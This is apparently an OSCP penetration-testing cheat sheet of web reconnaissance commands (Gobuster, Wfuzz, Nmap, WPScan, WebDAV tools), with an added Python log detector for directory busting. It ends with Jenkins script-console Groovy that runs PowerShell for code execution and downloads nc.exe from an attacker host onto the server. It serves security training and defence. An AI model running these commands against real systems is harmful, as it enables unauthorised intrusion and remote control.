OSCP
Web Application Directory bruteforcing / fingerprinting

Gobuster

Note: the commands below use the gobuster v1/v2 syntax. Gobuster v3 requires the dir subcommand (gobuster dir -u ... -w ...); the -u, -w, -s, -x, -t and -a flags keep their meaning.

gobuster -u http://ip -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u http://ip/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 307,200,204,301,302,403 -x txt,sh,cgi,pl -t 50
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
gobuster -s "200,204,301,302,307,403,500" -w /usr/share/seclists/Discovery/Web_Content/common.txt -u http://
gobuster -s "200,204,301,302,307,403,500" -u http://XXXX -w
gobuster -u http://ip -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 40

Gobuster comprehensive directory busting (-s lists the status codes to report, -a sets the User-Agent):
gobuster -s 200,204,301,302,307,403 -u http://ip -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Gobuster quick directory busting:
gobuster -u ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

Wfuzz

--hc hides responses with the listed status codes; --hl and --hh hide responses by line count and by character count (useful for dropping the server's default "not found" page once its size is known). -z range,1-65535 substitutes every value of the range into FUZZ; that URL is quoted so the shell does not treat ? as a glob.

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -c -z range,1-65535 --hl=2 "http://ip:60000/url.php?path=127.0.0.1:FUZZ"
wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ
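The Gobuster and Wfuzz commands above filter status codes client-side and can override the User-Agent (-a), so from the server side the durable signal of directory busting is a burst of 403/404 responses from one client rather than the tool name. The following is an added example, not part of the original cheat sheet: a small detector over constructed combined-format access log lines that flags a client either by a known tool User-Agent or by its miss ratio inside a sliding time window (thresholds are assumptions to tune per site).

```python
import re
from collections import defaultdict
from datetime import datetime
# Apache/nginx "combined" log format (assumption: the web server logs in this format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TOOL_UA = ("gobuster", "wfuzz", "dirbuster")  # default User-Agents of common busters

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], "%d/%b/%Y:%H:%M:%S %z")
    d["status"] = int(d["status"])
    return d

def detect_bruteforce(lines, window_s=60, min_requests=20, miss_ratio=0.8):
    """Map client IP -> reason for clients that either announce a busting tool in the
    User-Agent or send >= min_requests in window_s seconds with >= miss_ratio 403/404s."""
    by_ip = defaultdict(list)
    for e in filter(None, map(parse_line, lines)):
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        if any(t in e["ua"].lower() for e in events for t in TOOL_UA):
            flagged[ip] = "tool user-agent"
            continue
        start = 0  # sliding window over this client's time-ordered requests
        for end in range(len(events)):
            while (events[end]["ts"] - events[start]["ts"]).total_seconds() > window_s:
                start += 1
            win = events[start:end + 1]
            misses = sum(e["status"] in (403, 404) for e in win)
            if len(win) >= min_requests and misses / len(win) >= miss_ratio:
                flagged[ip] = f"{misses}/{len(win)} misses in {window_s}s"
                break
    return flagged

# Constructed sample log: one client with a spoofed Firefox UA guessing 25 paths in 25 s
# (hiding the tool name, as gobuster -a does), one normal visitor, one client with a tool UA.
_SCAN = ('10.0.0.5 - - [10/Oct/2023:13:55:{:02d} +0000] "GET /{} HTTP/1.1" {} 153 "-" '
         '"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"')
SAMPLE_LOG = [_SCAN.format(i, f"admin{i}.php", 200 if i == 3 else 404) for i in range(25)] + [
    '192.168.1.7 - - [10/Oct/2023:13:55:10 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '172.16.0.9 - - [10/Oct/2023:13:56:00 +0000] "GET /cgi-bin/ HTTP/1.1" 404 153 "-" "gobuster/2.0.1"',
]
```

Running detect_bruteforce(SAMPLE_LOG) flags 10.0.0.5 by miss ratio despite its browser-looking User-Agent and 172.16.0.9 by its tool User-Agent, while the single-request visitor is left alone.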
Nmap HTTP Form Fuzzer

nmap --script http-form-fuzzer --script-args 'http-form-fuzzer.targets={1={path=/},2={path=/register.html}}' -p 80 $ip

robots.txt audit

parsero -u http://X

Banner Grabbing

nc -v ip port

CMSmap

cmsmap.py https://x.x.x.x

WordPress Scan (WPScan)

wpscan -u ip/wp/

Note: -u is the old WPScan syntax; WPScan 3.x takes the target with --url (wpscan --url http://ip/wp/).

Drupal Scan

droopescan scan -u $ip

WebDAV

Test for incorrect permissions:

cadaver http://$ip
davtest http://$ip
Jenkins Script Console

Jenkins Groovy code, run from the script console, to test whether we have code execution:

def sout = new StringBuffer(), serr = new StringBuffer()
// Single quotes: Groovy does not interpolate $PSVERSIONTABLE, so PowerShell receives it literally
def proc = 'powershell.exe $PSVERSIONTABLE'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Nc Upload in Jenkins Server

NC upload to the Jenkins server from the script console:

def process = "powershell -command Invoke-WebRequest 'http://ip/nc.exe' -OutFile nc.exe".execute()
println("${process.text}")